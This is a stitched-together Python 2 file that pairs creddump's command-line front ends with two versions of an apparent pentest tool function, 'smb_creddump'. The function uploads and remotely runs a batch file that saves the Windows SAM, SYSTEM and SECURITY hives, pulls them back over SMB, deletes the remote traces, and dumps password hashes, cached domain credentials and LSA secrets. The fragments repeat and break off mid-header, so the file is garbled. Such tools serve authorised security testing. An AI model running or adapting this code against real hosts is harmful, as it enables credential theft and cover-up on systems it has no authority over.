#
# creddump is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# creddump is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with creddump.  If not, see <http://www.gnu.org/licenses/>.

"""
Command-line front end for creddump's domain-cache dump.

Takes a hex-encoded bootkey and the path to an offline SECURITY hive and
hands both to framework.win32.domcachedump.dump_file_hashes.  Python 2
only: it uses the print statement and str.decode("hex").

@author:       Brendan Dolan-Gavitt
@license:      GNU General Public License 2.0 or later
@contact:      [email protected]
"""

import sys
from framework.win32.domcachedump import dump_file_hashes

# argv[0] is the script name, so two positional arguments are required.
if len(sys.argv) < 3:
    print "usage: %s bootkey <security hive>" % sys.argv[0]
    sys.exit(1)

# argv[1] is the bootkey as a hex string; .decode("hex") turns it into the
# raw bytes the dumper expects.  A malformed hex string raises here (it is
# not caught, so it is not reported as a usage error).
dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])
def smb_creddump():
    """
    [-s] <ip> [ user ] [ passwd/nthash ]
    Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets

    Flow: write a batch file that runs ``reg save`` on the SAM, SYSTEM and
    SECURITY hives, upload and run it on the target, pull the three hive
    copies back over SMB, delete the remote artifacts, then parse the local
    copies with creddump (hashdump, domcachedump, lsasecrets).

    Relies on module-level names that are not defined in this block: sys,
    os, BASEDIR, CONF, text, set_creds, smbclient and winexe.  Python 2
    only (print statement, str.translate with a 256-byte table, ord() on
    single-character str).
    """
    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except:
        # Bare except: any import failure is reported through text().  If
        # text(..., 1) does not terminate the process, the three names
        # imported above stay unbound and the dump calls further down fail
        # with NameError -- confirm against text()'s definition.
        text("[!] Error: Creddump dependency missing.", 1)
    set_creds(3)
    text("[*] Extracting hives...")
    # Local staging file at a fixed path in the shared /tmp directory; it is
    # overwritten on every run and unlinked below.
    tmpfile = '/tmp/cred_run.bat'
    # Batch payload run on the target.  Everything in it is host-visible
    # telemetry: reg.exe invoked with "save HKLM\SAM|SYSTEM|SECURITY" and
    # three new .hive files written under \windows\temp.
    bat = ['@echo off',
           'cd \\windows\\temp',
           'reg save HKLM\\SAM sam.hive /y',
           'reg save HKLM\\SYSTEM system.hive /y',
           'reg save HKLM\\SECURITY security.hive /y']
    # The file object is never closed explicitly; relies on refcount cleanup.
    open(tmpfile, 'w').write('\r\n'.join(bat))
    smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
    # winexe() presumably runs the batch file on the target; whatever it
    # returns is printed verbatim.
    print winexe('\\windows\\temp\\cred_run.bat')
    text("[*] Downloading hives...")
    # Hive copies land in the current directory as <ip>_sam.hive,
    # <ip>_system.hive and <ip>_security.hive.  They contain credential
    # material and persist after this function returns.
    smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])
    text("[*] Removing temp files...")
    # Best-effort cleanup on the target; return values are not checked, so a
    # failed delete leaves the batch file and hive copies on the remote host.
    smbclient('del "\\windows\\temp\\cred_run.bat"')
    smbclient('del "\\windows\\temp\\sam.hive"')
    smbclient('del "\\windows\\temp\\system.hive"')
    smbclient('del "\\windows\\temp\\security.hive"')
    os.unlink(tmpfile)
    text("[*] Extracting SAM credentials...")
    # Return values of both dumpers are discarded here; they are assumed to
    # emit their own output -- TODO confirm.
    hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')
    text("[*] Extracting MSCASH credentials...")
    domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
    # Code below ripped from creddump's lsadump.py
    text("[*] Extracting LSA Secrets...")
    try:
        # 256-entry translation table for the hexdump's ASCII column: a byte
        # whose repr() is exactly 3 characters (quote, char, quote -- i.e. it
        # needs no escaping) maps to itself, everything else to '.'.
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
        secrets = lsasecrets.get_file_secrets(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
        if not secrets:
            text("[!] Unable to read LSA secrets.")
        else:
            # 16-bytes-per-row hexdump per secret: 4-digit hex offset, the
            # hex bytes left-justified to 3*16 columns, then the filtered
            # ASCII column.  The while loop consumes secrets[k] in place.
            for k in secrets:
                N = 0
                length = 16
                result = ''
                while secrets[k]:
                    s, secrets[k] = secrets[k][:length], secrets[k][length:]
                    hexa = ' '.join(["%02X" % ord(x) for x in s])
                    s = s.translate(FILTER)
                    result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
                    N += length
                print k
                print result
    except:
        # Any failure in the LSA section (missing hive, parse error, ...) is
        # silently dropped; the closing message below prints regardless.
        pass
    text("[*] SYSTEM, SAM and SECURITY hives were saved in the current directory.")
# You should have received a copy of the GNU General Public License
# along with creddump.  If not, see <http://www.gnu.org/licenses/>.

"""
Command-line front end for creddump's domain-cache dump.

Takes the paths to offline SYSTEM and SECURITY hives plus a literal
"true"/"false" flag (Vista/7 or not) and hands them to
framework.win32.domcachedump.dump_file_hashes.  Python 2 only (print
statement).

@author:       Brendan Dolan-Gavitt
@license:      GNU General Public License 2.0 or later
@contact:      [email protected]
"""

import sys
from framework.win32.domcachedump import dump_file_hashes


def showUsage():
    """Print the usage line plus one example invocation per Windows generation."""
    print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0]
    print "\nExample (Windows Vista/7):"
    print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
    print "\nExample (Windows XP):"
    print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]


# Three positional arguments are required (argv[0] is the script name).
if len(sys.argv) < 4:
    showUsage()
    sys.exit(1)

# The third argument is accepted only as the exact strings "true" or "false".
if sys.argv[3] not in ["true", "false"]:
    showUsage()
    sys.exit(1)

# Boolean form of the flag.  Note that the call below passes the raw
# sys.argv[3] string rather than this value, so the dumper receives
# "true"/"false" as text (both of which are truthy).
vista = True if sys.argv[3] == "true" else False

dump_file_hashes(sys.argv[1], sys.argv[2], sys.argv[3])
def smb_creddump():
    """
    [-s] <ip/file/range> [ user ] [ passwd/nthash ]
    Extract SAM, SECURITY, SYSTEM hives and dump SAM, DCC, LSA Secrets

    Flow: write a batch file that runs ``reg save`` on the SAM, SYSTEM and
    SECURITY hives, upload and run it on the target, pull the three hive
    copies back over SMB, delete the remote artifacts, then parse the local
    copies with creddump (hashdump, domcachedump, lsasecrets).  Every
    status line is prefixed with CONF["smb_ip"] so output from several
    targets can be told apart.

    Relies on module-level names that are not defined in this block: sys,
    os, BASEDIR, CONF, text, set_creds, smbclient and winexe.  Python 2
    only (str.translate with a 256-byte table, ord() on single-character
    str).
    """
    try:
        sys.path.insert(0, BASEDIR + '/creddump')
        from framework.win32 import hashdump, domcachedump, lsasecrets
    except:
        # Bare except: any import failure is reported through text().  If
        # text(..., 1) does not terminate the process, the three names
        # imported above stay unbound and the dump calls further down fail
        # with NameError -- confirm against text()'s definition.
        text("[!] Error: Creddump dependency missing.", 1)
    set_creds(3)
    text("[*] %s Extracting hives..." % (CONF["smb_ip"]))
    # Local staging file in the shared /tmp directory; the target address is
    # part of the name, so runs against different targets do not collide.
    # It is unlinked below.
    tmpfile = '/tmp/cred_run.%s.bat' % (CONF["smb_ip"])
    # Batch payload run on the target.  Everything in it is host-visible
    # telemetry: reg.exe invoked with "save HKLM\SAM|SYSTEM|SECURITY" and
    # three new .hive files written under \windows\temp.
    bat = [
        '@echo off',
        'cd \\windows\\temp',
        'reg save HKLM\\SAM sam.hive /y',
        'reg save HKLM\\SYSTEM system.hive /y',
        'reg save HKLM\\SECURITY security.hive /y'
    ]
    # The file object is never closed explicitly; relies on refcount cleanup.
    open(tmpfile, 'w').write('\r\n'.join(bat))
    # The remote name is fixed (cred_run.bat) even though the local one is
    # per-target.
    smbclient('put "%s" "\\windows\\temp\\cred_run.bat"' % tmpfile)
    # winexe() presumably runs the batch file on the target; its return value
    # is embedded in the status line.
    text("[*] %s Running cred_run.bat\n%s\n" % (CONF["smb_ip"], winexe('\\windows\\temp\\cred_run.bat')))
    text("[*] %s Downloading hives..." % (CONF["smb_ip"]))
    # Hive copies land in the current directory as <ip>_sam.hive,
    # <ip>_system.hive and <ip>_security.hive.  They contain credential
    # material and persist after this function returns.
    smbclient('get "\\windows\\temp\\sam.hive" "%s_sam.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\system.hive" "%s_system.hive"' % CONF['smb_ip'])
    smbclient('get "\\windows\\temp\\security.hive" "%s_security.hive"' % CONF['smb_ip'])
    text("[*] %s Removing temp files..." % (CONF["smb_ip"]))
    # Best-effort cleanup on the target; return values are not checked, so a
    # failed delete leaves the batch file and hive copies on the remote host.
    smbclient('del "\\windows\\temp\\cred_run.bat"')
    smbclient('del "\\windows\\temp\\sam.hive"')
    smbclient('del "\\windows\\temp\\system.hive"')
    smbclient('del "\\windows\\temp\\security.hive"')
    os.unlink(tmpfile)
    text("[*] %s Extracting SAM credentials..." % (CONF["smb_ip"]))
    # Both dumpers' return values are joined with "\n" below, so they are
    # assumed to be iterables of strings -- TODO confirm against creddump.
    hashes = hashdump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_sam.hive')
    text("[*] %s Extracting MSCASH credentials..." % (CONF["smb_ip"]))
    mscash = domcachedump.dump_file_hashes(CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
    text("[*] %s SAM hashes\n%s" % (CONF["smb_ip"], "\n".join(hashes)))
    text("[*] %s MsCash\n%s" % (CONF["smb_ip"], "\n".join(mscash)))
    # Code below ripped from creddump's lsadump.py
    text("[*] %s Extracting LSA Secrets..." % (CONF["smb_ip"]))
    try:
        # 256-entry translation table for the hexdump's ASCII column: a byte
        # whose repr() is exactly 3 characters (quote, char, quote -- i.e. it
        # needs no escaping) maps to itself, everything else to '.'.
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
        secrets = lsasecrets.get_file_secrets(
            CONF['smb_ip'] + '_system.hive', CONF['smb_ip'] + '_security.hive')
        if not secrets:
            text("[!] %s Error(smb_creddump): Unable to read LSA secrets." % (CONF["smb_ip"]))
        else:
            # This rebinds `secrets` to an empty list before it is iterated,
            # so the for loop below runs zero times and the "LSA Secrets"
            # line is emitted with an empty body; the hexdump code after it
            # is effectively dead in this revision.
            secrets = []
            # Intended 16-bytes-per-row hexdump per secret: 4-digit hex
            # offset, hex bytes left-justified to 3*16 columns, then the
            # filtered ASCII column, collected as alternating name/dump
            # entries.
            for k in secrets:
                N = 0
                length = 16
                result = ''
                while secrets[k]:
                    s, secrets[k] = secrets[k][:length], secrets[k][length:]
                    hexa = ' '.join(["%02X" % ord(x) for x in s])
                    s = s.translate(FILTER)
                    result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
                    N += length
                secrets.append(k)
                secrets.append(result)
            text("[*] %s LSA Secrets\n%s" % (CONF["smb_ip"], "\n".join(secrets)))
    except:
        # Any failure in the LSA section (missing hive, parse error, ...) is
        # silently dropped; the closing message below prints regardless.
        pass
    text(
        "[*] %s SYSTEM, SAM and SECURITY hives were saved in the current directory."
        % (CONF["smb_ip"]))